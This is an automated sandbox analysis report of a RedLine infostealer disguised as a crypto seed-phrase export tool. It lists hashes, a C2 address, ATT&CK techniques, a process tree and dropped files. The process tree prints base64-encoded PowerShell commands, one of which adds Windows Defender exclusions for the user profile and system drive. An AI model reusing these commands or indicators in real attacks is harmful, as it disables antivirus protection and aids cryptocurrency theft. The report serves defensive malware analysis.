redline | 21b4e9035539bfd9e1d5887325fd5c671c113830035b347b0f1d002a7fa5ead6

Analysis

max time kernel
135s
max time network
163s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
28-11-2024 06:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Export 12-word secret recovery phrase.exe
Size

224.6MB
MD5

eb4fb6e1c5ebfb3775f4c69f096607b4
SHA1

99551ae3ba358acf9c2c09bab8bd8ed2e207b62d
SHA256

149426bcc226da12143a3fed2924c057eb2b6cde0d7c35da828619722d92bebd
SHA512

0e26cd355c760148455ee9f5c6b21360135dcd88fcff9e996ce0ffd295e9e2e7397e1c7ec2293bbe327ff142b39c62b0c6c1fc77884f4614dcaaa8acaa5b966f
SSDEEP

6291456:K3TALfelJCmbxJALe9CCr/BH69l28PxH8b/3fwbBHjB3sM3:kTALGJCmlJALACCDBH69k8kAbBHjB3sS

Score

10^/10

redline exodus defense_evasion discovery infostealer spyware

Malware Config

Extracted

Family

redline

Botnet

Exodus

85.117.241.171:1912

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/968-48-0x0000000000570000-0x00000000005C2000-memory.dmp	family_redline

Redline family
redline

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation	Export 12-word secret recovery phrase.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation	Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation	Exodus.exe

Executes dropped EXE 12 IoCs

pid	Process
952	PrWYC.exe
968	PrWYC.exe
2160	exodus-windows-x64-24.41.2.exe
2856	Update.exe
1656	Squirrel.exe
2640	Exodus.exe
1228	Update.exe
2084	Exodus.exe
1576	Exodus.exe
1248	Exodus.exe
4152	Exodus.exe
1752	Exodus.exe

Loads dropped DLL 14 IoCs

pid	Process
2640	Exodus.exe
2084	Exodus.exe
1576	Exodus.exe
2084	Exodus.exe
2084	Exodus.exe
2084	Exodus.exe
2084	Exodus.exe
1248	Exodus.exe
4152	Exodus.exe
1752	Exodus.exe
4152	Exodus.exe
4152	Exodus.exe
4152	Exodus.exe
4152	Exodus.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 952 set thread context of 968	952	PrWYC.exe	84

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrWYC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	exodus-windows-x64-24.41.2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Squirrel.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrWYC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Export 12-word secret recovery phrase.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\exodus\shell\open	Exodus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\exodus\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\exodus\\app-24.41.2\\Exodus.exe\" \"--\" \"%1\""	Exodus.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\exodus	Exodus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\exodus\URL Protocol	Exodus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\exodus\ = "URL:exodus"	Exodus.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\exodus\shell\open\command	Exodus.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\exodus\shell	Exodus.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
5016	powershell.exe
4440	powershell.exe
5016	powershell.exe
4440	powershell.exe
2856	Update.exe
2856	Update.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeIncreaseQuotaPrivilege	5016	powershell.exe
Token: SeSecurityPrivilege	5016	powershell.exe
Token: SeTakeOwnershipPrivilege	5016	powershell.exe
Token: SeLoadDriverPrivilege	5016	powershell.exe
Token: SeSystemProfilePrivilege	5016	powershell.exe
Token: SeSystemtimePrivilege	5016	powershell.exe
Token: SeProfSingleProcessPrivilege	5016	powershell.exe
Token: SeIncBasePriorityPrivilege	5016	powershell.exe
Token: SeCreatePagefilePrivilege	5016	powershell.exe
Token: SeBackupPrivilege	5016	powershell.exe
Token: SeRestorePrivilege	5016	powershell.exe
Token: SeShutdownPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeSystemEnvironmentPrivilege	5016	powershell.exe
Token: SeRemoteShutdownPrivilege	5016	powershell.exe
Token: SeUndockPrivilege	5016	powershell.exe
Token: SeManageVolumePrivilege	5016	powershell.exe
Token: 33	5016	powershell.exe
Token: 34	5016	powershell.exe
Token: 35	5016	powershell.exe
Token: 36	5016	powershell.exe
Token: SeShutdownPrivilege	2640	Exodus.exe
Token: SeCreatePagefilePrivilege	2640	Exodus.exe
Token: SeShutdownPrivilege	2640	Exodus.exe
Token: SeCreatePagefilePrivilege	2640	Exodus.exe
Token: SeShutdownPrivilege	2640	Exodus.exe
Token: SeCreatePagefilePrivilege	2640	Exodus.exe
Token: SeShutdownPrivilege	2640	Exodus.exe
Token: SeCreatePagefilePrivilege	2640	Exodus.exe
Token: SeDebugPrivilege	2856	Update.exe
Token: SeShutdownPrivilege	1248	Exodus.exe
Token: SeCreatePagefilePrivilege	1248	Exodus.exe
Token: SeShutdownPrivilege	1248	Exodus.exe
Token: SeCreatePagefilePrivilege	1248	Exodus.exe
Token: SeShutdownPrivilege	1248	Exodus.exe
Token: SeCreatePagefilePrivilege	1248	Exodus.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2856	Update.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4788 wrote to memory of 4440	4788	Export 12-word secret recovery phrase.exe	79
PID 4788 wrote to memory of 4440	4788	Export 12-word secret recovery phrase.exe	79
PID 4788 wrote to memory of 4440	4788	Export 12-word secret recovery phrase.exe	79
PID 4788 wrote to memory of 5016	4788	Export 12-word secret recovery phrase.exe	81
PID 4788 wrote to memory of 5016	4788	Export 12-word secret recovery phrase.exe	81
PID 4788 wrote to memory of 5016	4788	Export 12-word secret recovery phrase.exe	81
PID 4788 wrote to memory of 952	4788	Export 12-word secret recovery phrase.exe	83
PID 4788 wrote to memory of 952	4788	Export 12-word secret recovery phrase.exe	83
PID 4788 wrote to memory of 952	4788	Export 12-word secret recovery phrase.exe	83
PID 952 wrote to memory of 968	952	PrWYC.exe	84
PID 952 wrote to memory of 968	952	PrWYC.exe	84
PID 952 wrote to memory of 968	952	PrWYC.exe	84
PID 952 wrote to memory of 968	952	PrWYC.exe	84
PID 952 wrote to memory of 968	952	PrWYC.exe	84
PID 952 wrote to memory of 968	952	PrWYC.exe	84
PID 952 wrote to memory of 968	952	PrWYC.exe	84
PID 952 wrote to memory of 968	952	PrWYC.exe	84
PID 4788 wrote to memory of 2160	4788	Export 12-word secret recovery phrase.exe	85
PID 4788 wrote to memory of 2160	4788	Export 12-word secret recovery phrase.exe	85
PID 4788 wrote to memory of 2160	4788	Export 12-word secret recovery phrase.exe	85
PID 2160 wrote to memory of 2856	2160	exodus-windows-x64-24.41.2.exe	90
PID 2160 wrote to memory of 2856	2160	exodus-windows-x64-24.41.2.exe	90
PID 2160 wrote to memory of 2856	2160	exodus-windows-x64-24.41.2.exe	90
PID 2856 wrote to memory of 1656	2856	Update.exe	95
PID 2856 wrote to memory of 1656	2856	Update.exe	95
PID 2856 wrote to memory of 1656	2856	Update.exe	95
PID 2856 wrote to memory of 2640	2856	Update.exe	96
PID 2856 wrote to memory of 2640	2856	Update.exe	96
PID 2640 wrote to memory of 1228	2640	Exodus.exe	97
PID 2640 wrote to memory of 1228	2640	Exodus.exe	97
PID 2640 wrote to memory of 1228	2640	Exodus.exe	97
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 2084	2640	Exodus.exe	98
PID 2640 wrote to memory of 1576	2640	Exodus.exe	99
PID 2640 wrote to memory of 1576	2640	Exodus.exe	99
PID 2856 wrote to memory of 1248	2856	Update.exe	102

C:\Users\Admin\AppData\Local\Temp\Export 12-word secret recovery phrase.exe
"C:\Users\Admin\AppData\Local\Temp\Export 12-word secret recovery phrase.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4788
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdwBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAbgBiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBvAHUAcgAgAEcAZQBuAGUAcgBhAHQAZQBkACAAUwBlAGUAZAAgAHcAYQBzACAAcwB1AGMAZQBzAHMAZgB1AGwAeQAgAHMAYQB2AGUAZAAgAG8AbgAgAHkAbwB1AHIAIABEAGUAcwBrAHQAbwBwACcALAAnACcALAAnAE8ASwAnACwAJwBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AJwApADwAIwB1AGoAawAjAD4A"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4440
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAdgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAbgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAegBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAZAB6ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5016
- C:\Users\Admin\AppData\Roaming\PrWYC.exe
  "C:\Users\Admin\AppData\Roaming\PrWYC.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Users\Admin\AppData\Roaming\PrWYC.exe
    "{path}"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:968
- C:\Users\Admin\AppData\Roaming\exodus-windows-x64-24.41.2.exe
  "C:\Users\Admin\AppData\Roaming\exodus-windows-x64-24.41.2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
    "C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe" --install .
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2856
  - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Squirrel.exe
      "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Squirrel.exe" --updateSelf=C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1656
  - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
      "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --squirrel-install 24.41.2
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2640
    - - C:\Users\Admin\AppData\Local\exodus\Update.exe
        
        C:\Users\Admin\AppData\Local\exodus\Update.exe --createShortcut=Exodus.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1228
    - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1788,i,1539509602339290546,16474310108571426241,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:2
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2084
    - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --field-trial-handle=2180,i,1539509602339290546,16474310108571426241,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1576
  - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
      "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --squirrel-firstrun
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:1248
    - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,17324193493450819891,9666536371630918795,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1928 /prefetch:2
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4152
    - - C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe
        
        "C:\Users\Admin\AppData\Local\exodus\app-24.41.2\Exodus.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Exodus" --field-trial-handle=2136,i,17324193493450819891,9666536371630918795,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2000 /prefetch:3
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
b396bbdb337733587e09da770fae11cd

SHA1
c88fdfb5790fcf462191fcb9a9fddceba609c5d5

SHA256
9ae98b74a593578bc96e027224a8410ff1163d92bf352a396bf8b9e6abb74ec3

SHA512
e3fd89db5b77bdf0d30cde96bd8ae574e1c276f933bc0b2de90b913b7a6b80bc5783e741231bfa6e0a94998b9d1789b6b1eb8edaddd3efcc112709a303de8ee0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
b05cc65a3a03eebb24dcd6701383329a

SHA1
4993e91ddea4e7c7117c03775dfbce097c8fcbf6

SHA256
94eef075df3ded35f1a5226488f193398b4934f0d50713ec6fa858c0f3f07efb

SHA512
e75d7278c741772835fc2199ed4e1b1fc66cfdfeea0e4e3e1deea328521a474e4216e2f296b289a95a1ef32b5091849fac35a679b47519906d9d6356ba1f7f2c

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\RELEASES

Filesize
79B

MD5
c70eeb234d01bda96b536f2f7bc6faad

SHA1
d0b8bfd63f0b1c02bd1bc15c0e7505f2a052347e

SHA256
1247e2466d6afc66fdc0fc32647b7c6294f80bc3508f69fc87c4b234a61895db

SHA512
01b678e322c974e4e78decb2e53a1078de8f98bcf89a1ebf4dbbc2d64bcf69805c1c2a6d6a83bb63abf8081a69b2590b675997d893a6928cdea602370321b6df

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe

Filesize
1.7MB

MD5
c5f6cda4976ae38cd9fba3d1e5ebd244

SHA1
2006c37f01d010963a4331c42e579b87a2d16039

SHA256
dae7bd888b715b8e215482bc5ea6f028ded32a3ad88bf4acb6431d2a62ffe3f4

SHA512
a1a7529b0ceb3df471e803eac1d9256c009a9c8252884f64a28a59d59753c75e1bff726a35af02db5bdf20a2d194850bfdbed163722b09465ca32d10d059524d

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\background.gif

Filesize
10.7MB

MD5
9b01c5eab2c0bbf63c29944e485c062d

SHA1
a8182f1d6363817757d9a4c652ca78591826c803

SHA256
eb59903ac99cd42ace0b9204c6f2696c61ced7ff9c94e4da1334b3b5356655fc

SHA512
edd950fc94e1c06960541527fda50f2da2f6c99206b691ab465eef69fdae491ca9e3d9b29c3e322f3590a64c73e59c0f24028e873557037a9807e83d946a383b

Download Submit
C:\Users\Admin\AppData\Local\SquirrelTemp\setupIcon.ico

Filesize
352KB

MD5
f4fd06cc518f26026049ccce65a4ec81

SHA1
6298ba68c06b31f1ec19e7ce757c26ff3e6df3f7

SHA256
381905c1421a53741029db9ac3b9544bc39daabc8e14a8883ab0b64c5c0d2ca3

SHA512
e53583d6a33b8f4b8d9d71aa19b1027b2152e35bc1595ee62916be3f1eb95015b4b1ca70d6bdeaa54742c11a374ccd663062229ce22410dc3d2b96bf8d6538d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gopjkfej.nkv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\exodus\Exodus.exe

Filesize
599KB

MD5
48e0b55498ee92bf6dacd3e850f799f5

SHA1
b4eaccd6a00778a2a26bce0f3053965516be0589

SHA256
330c1d6232c4b7d2d83a927512ffcc920020caa2ccd36c9cf14fd6b0577e5951

SHA512
911d69d2d5038553c7e9975e81557022cb67dc0858a94cdbfb3e5b865a087b1c245bd59a2ed227fbcc78a643bbfa3961cf389c63bb73314ecadd35c53b4b4c2e

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\chrome_100_percent.pak

Filesize
148KB

MD5
cb4f128469cd84711ed1c9c02212c7a8

SHA1
8ae60303be80b74163d5c4132de4a465a1eafc52

SHA256
7dd5485def22a53c0635efdf8ae900f147ec8c8a22b9ed71c24668075dd605d3

SHA512
0f0febe4ee321eb09d6a841fe3460d1f5b657b449058653111e7d0f7a9f36620b3d30369e367235948529409a6ce0ce625aede0c61b60926dec4d2c308306277

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\chrome_200_percent.pak

Filesize
223KB

MD5
e9c1423fe5d139a4c88ba8b107573536

SHA1
46d3efe892044761f19844c4c4b8f9576f9ca43e

SHA256
2408969599d3953aae2fb36008e4d0711e30d0bc86fb4d03f8b0577d43c649fa

SHA512
abf8d4341c6de9c722168d0a9cf7d9bac5f491e1c9bedfe10b69096dcc2ef2cd08ff4d0e7c9b499c9d1f45fdb053eafc31add39d13c8287760f9304af0727bf4

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\d3dcompiler_47.dll

Filesize
4.7MB

MD5
2ebe8347e29f95d17e07ac1e9261fb9f

SHA1
3569d60d4bdce9956ace1933520ef2ebce81c657

SHA256
dddd35ab70247996b77ea68237386bbdc47e63e4ae41bf3c4a6437e989c80bd6

SHA512
a6c93cf500196d5f9899667199f88142e21c2600676f9361c4729b5c11321828b6c9ee668b5555f8bc165077aa1860bfebc17301bef300aede5ad72447914c6b

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\ffmpeg.dll

Filesize
2.6MB

MD5
a05bb21301445c4c069442734f9c8cb0

SHA1
a136f0cdced8399e07e9d9989d9d3f8fe280b0ea

SHA256
0c23ab1b8b798a5df569652115bf9ac2cb5fee46fef53703bcaac2759fc1154a

SHA512
c00ce963d2165a29e64b8039a51a4fe332eada9b654e1234c57a0342306e81a3b16933480bb4742a3e946ea581b085f0a543e5bb867755689454ef385b03997d

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\icudtl.dat

Filesize
10.0MB

MD5
ffd67c1e24cb35dc109a24024b1ba7ec

SHA1
99f545bc396878c7a53e98a79017d9531af7c1f5

SHA256
9ae98c06cbb0ea43c5cd6b5725310c008c65e46072421a1118cb88e1de9a8b92

SHA512
e1a865e685d2d3bacd0916d4238a79462519d887feb273a251120bb6af2b4481d025f3b21ce9a1a95a49371a0aa3ecf072175ba756974e831dbfde1f0feaeb79

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\libEGL.dll

Filesize
479KB

MD5
c44d0f8ddc7dadc835f366d827dd0831

SHA1
6dfcf00e1dd60dc6a030f7a86f73590eecb233ff

SHA256
a2fc88189a9e2b9a32be964e4f7b82b3caf1eaff23794e2c6b94bfae1864c595

SHA512
c190bf9c6a61b3ef2287e90147ad523eb8275338c731756fce3428ec422043c47da50722694d063f132f233a37c2303c4a34669b22920782401620d7afe156c1

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\libGLESv2.dll

Filesize
7.7MB

MD5
65bfefc5ba9b91bb9d0f78e791286484

SHA1
4866c1dd11fe0ee98f68c3990ae13b6a3317795d

SHA256
9d0b22de4d28e3602db8d5cf79626503f879b8035dd3dfd94fbd49bf9b9152b7

SHA512
b53004dfa8dd9b4187b74724ce06e3b1b3b9254eb76b1b935e4575f4c963a2b9fc9018d8e667a412c9ff1afc1121a3375ba446b8ca592a9cf51cda0eb5fdd8cb

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\locales\en-US.pak

Filesize
454KB

MD5
5c52a86b21633b55b383c20f16859b2f

SHA1
126585e68cb17f241351004e21c1d30e65de1cf6

SHA256
41123d72bd8e289e85bd35227aabb4cc61fe1de02b5cd7a7834e5ec200bc2078

SHA512
2a1b6a4becfb97d470cd7de74857edf2cc9cd4a77f377ccd9bf60c30539862ff1ac3ed6cc849632a3ed4ea0e5b92679f3cc5b4cb26cc7eaaa2bb2f4ae9974a6a

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\resources.pak

Filesize
5.3MB

MD5
756ffdd90a3e7837cb1d086e9d2a02a2

SHA1
594224dff9bc1b35368ece832e3ca43776e76743

SHA256
f299b8d2e59b047f8473e86d88a9ef20b447627c40b5d5a2ebb77c7144faca94

SHA512
198423de82a2f0747b722f1c965ede7760e4b2b5b1039c18fbadda2fa12f21013aa90b11521d16f94a04a74c2239ab5a82690d5bffbd0aeedb2b8ebece88e514

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\squirrel.exe

Filesize
2.1MB

MD5
5341b31761b38bb6a42cb155aaea8661

SHA1
46a98e293a2596d51c8d4171b39fa2549def9d96

SHA256
55f4fdbd5fc93ded3565dd1af4d16479be3a27dab565243464107d8a1b114685

SHA512
906583cd16ef56dfe13c44fbb4556a0d7d9160e63ab0e6d798d526f5cb7466812a6bbabe95448d339bf8a7ef740229ce39964d2502880ad996dba418d0da6080

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\v8_context_snapshot.bin

Filesize
646KB

MD5
a62fbbb671bf975ed46b42d9cf437bcd

SHA1
408b595b1dc6658533e0db1d35f509ab9ee70525

SHA256
a8bd22478c4f85afa836c89d3a7f52c606b17872fbbefce268b499bedede10ae

SHA512
87c934670df70afcced0ea5c73449a17ad27d5b6a25cedad9eb61634aaff8a42b713f578e861c2efbc77593793bba240a1495822b69c99a8ecaef64b07b6a62c

Download Submit
C:\Users\Admin\AppData\Local\exodus\app-24.41.2\vk_swiftshader.dll

